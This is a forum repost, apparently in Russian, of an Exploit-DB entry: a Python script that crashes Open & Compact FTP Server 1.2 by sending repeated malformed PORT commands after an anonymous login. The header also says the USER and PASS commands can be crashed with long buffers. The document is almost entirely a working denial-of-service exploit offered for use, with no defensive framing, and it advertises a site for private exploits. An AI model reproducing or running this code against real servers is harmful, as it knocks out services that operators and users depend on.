Exploit (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12698
Проверка EDB
  1. Пройдено
Автор
MA3STR0-DZ
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-05-22
Код:
=============================================================================
# Tilte: Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service.
=============================================================================

# Date....................: [22-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Open&Comapct Ftp Server 1.2 "PORT" command Remote Denial of Service]
# Impact..................: [Remote]
# Site Software ..........: [http://sourceforge.net/projects/open-ftpd/]
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [[email protected]] 
# Vulnerability: Remote Denial of service .
# Part ExplOit & Bug Codes :
---

#!/usr/bin/python

import socket

print '---------------------------------------------------------------------'
print ' Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service'
print ' url: http://sourceforge.net/projects/open-ftpd'
print ' author: Ma3sTr0-Dz'
print ' mail: [email protected]'
print ' site: www.sec4ever.com'
print ' USER and PASS methods are vulnerable too, just pass "A: " * 1000'
print ' as buffer'
print '---------------------------------------------------------------------'

buffer = "A" * 5

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
s.send('USER %s\r\n' % "anonymous")

for i in range(1,31):
   s.send('PORT %s\n\n' % buffer)
   print "Sending request n. " + str(i)
 
Источник
www.exploit-db.com

Похожие темы